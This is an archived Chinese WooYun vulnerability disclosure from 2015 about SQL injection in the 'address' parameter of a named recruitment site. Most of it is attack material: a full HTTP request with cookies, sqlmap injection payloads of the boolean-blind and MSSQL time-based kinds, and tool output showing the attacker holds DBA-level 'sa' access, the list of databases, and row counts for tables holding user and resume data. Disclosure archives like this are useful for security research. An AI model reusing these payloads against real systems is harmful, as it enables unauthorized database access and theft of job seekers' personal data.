乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-18: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
RT,多处存在注入
http://job.fescoadecco.com
POST /fescojob/enterpriseInfoAction.action?address=-1&Eid=8a8bd08b3a718fdf013a724b393d0081&hOpt=queryById&nextPage=2 HTTP/1.1Content-Length: 11Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://job.fescoadecco.comCookie: JSESSIONID=A1057498597571D93FDB97D6DF487610; userName=lnvqlfgw; userPwd=afyodfwrHost: job.fescoadecco.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*address=482
sqlmap resumed the following injection point(s) from stored session:---Parameter: address (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: address=-3786' OR 8037=8037 AND 'stgY'='stgY&Eid=8a8bd08b3a718fdf013a724b393d0081&hOpt=queryById&nextPage=2 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: address=-1' AND 9833=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'NVCe'='NVCe&Eid=8a8bd08b3a718fdf013a724b393d0081&hOpt=queryById&nextPage=2---back-end DBMS: Microsoft SQL Server 2012current user: 'sa'current database: 'fescojob'current user is DBA: Trueavailable databases [7]:[*] fescojob[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: fescojob+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.tbl_user | 2528 || dbo.tbl_operatLog | 2320 || dbo.tbl_parameter | 1793 || dbo.tbl_resume | 1425 || dbo.tbl_file | 1167 || dbo.tbl_releasePosition | 512 || dbo.tbl_favorite | 213 || dbo.tbl_applyRecord | 153 || dbo.tbl_positionMonitor | 143 || dbo.tbl_paraKind | 42 || dbo.tbl_articleList | 36 || dbo.tbl_enterpriseInfo | 22 || dbo.tbl_linkImageMng | 17 || dbo.tbl_selfInfo | 9 || dbo.tbl_sys_user | 5 || dbo.tablename | 1 || dbo.tbl_collegeBBS | 1 || dbo.tbl_collegeEmploy | 1 || dbo.tbl_collegeLink | 1 || dbo.tbl_trainInstitut | 1 |+-------------------------+---------+
求高rank
危害等级:无影响厂商忽略
忽略时间:2015-12-23 10:34
漏洞Rank:4 (WooYun评价)
暂无